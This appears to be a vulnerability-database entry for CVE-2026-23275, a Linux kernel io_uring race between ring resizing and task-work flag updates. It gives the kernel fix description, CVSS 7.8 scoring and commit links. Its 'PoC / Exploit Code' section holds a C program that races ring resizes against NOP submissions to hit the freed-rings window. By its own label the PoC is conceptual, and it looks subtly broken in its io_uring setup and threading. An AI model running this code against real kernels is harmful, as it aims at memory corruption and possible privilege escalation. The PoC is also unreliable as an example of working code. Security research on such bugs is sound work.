Security Vulnerability Report
CVE-2026-23275 CVSS 7.8 HIGH

CVE-2026-23275

Published: 2026-03-20 09:16:13
Last Modified: 2026-04-02 15:16:30
Status: Undergoing Analysis
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

io_uring: ensure ctx->rings is stable for task work flags manipulation

If DEFER_TASKRUN | SETUP_TASKRUN is used and task work is added while the ring is being resized, it's possible for the OR'ing of IORING_SQ_TASKRUN to happen in the small window of swapping into the new rings and the old rings being freed.

Prevent this by adding a 2nd ->rings pointer, ->rings_rcu, which is protected by RCU. The task work flags manipulation is inside RCU already, and if the resize ring freeing is done post an RCU synchronize, then there's no need to add locking to the fast path of task work additions.

Note: this is only done for DEFER_TASKRUN, as that's the only setup mode that supports ring resizing. If this ever changes, then they too need to use the io_ctx_mark_taskrun() helper.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Linux Kernel (before the fix patch)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
#include <liburing.h>
#include <pthread.h>
#include <stdio.h>
#include <unistd.h>

// Conceptual PoC for CVE-2026-23275
// This code attempts to trigger the race condition between
// io_uring resize and task work addition.

struct io_uring ring;

void* resize_thread_func(void* arg) {
    while (1) {
        // Constantly resize the ring to trigger the vulnerable window
        // where ctx->rings is swapped and old one is freed.
        io_uring_queue_resize(&ring, 32);
        io_uring_queue_resize(&ring, 64);
    }
    return NULL;
}

void* task_work_thread_func(void* arg) {
    while (1) {
        // Submit operations to trigger task work.
        // This attempts to hit the ctx->rings access during the swap.
        struct io_uring_sqe *sqe = io_uring_get_sqe(&ring);
        if (sqe) {
            io_uring_prep_nop(sqe);
            io_uring_submit(&ring);
        }
    }
    return NULL;
}

int main() {
    // Setup io_uring with DEFER_TASKRUN
    struct io_uring_params p = {0};
    // Note: Actual flag values depend on kernel headers
    p.flags = IORING_SETUP_DEFER_TASKRUN;
    if (io_uring_queue_init_params(32, &ring, &p) < 0) {
        perror("io_uring_queue_init_params");
        return 1;
    }

    pthread_t t1, t2;
    pthread_create(&t1, NULL, resize_thread_func, NULL);
    pthread_create(&t2, NULL, task_work_thread_func, NULL);
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    return 0;
}
```

References

https://git.kernel.org/stable/c/46dc07d5f31411cc023f3bf1f4a23a07bf6e0ed1
https://git.kernel.org/stable/c/7cc4530b3e952d4a5947e1e55d06620d8845d4f5
https://git.kernel.org/stable/c/96189080265e6bb5dde3a4afbaf947af493e3f82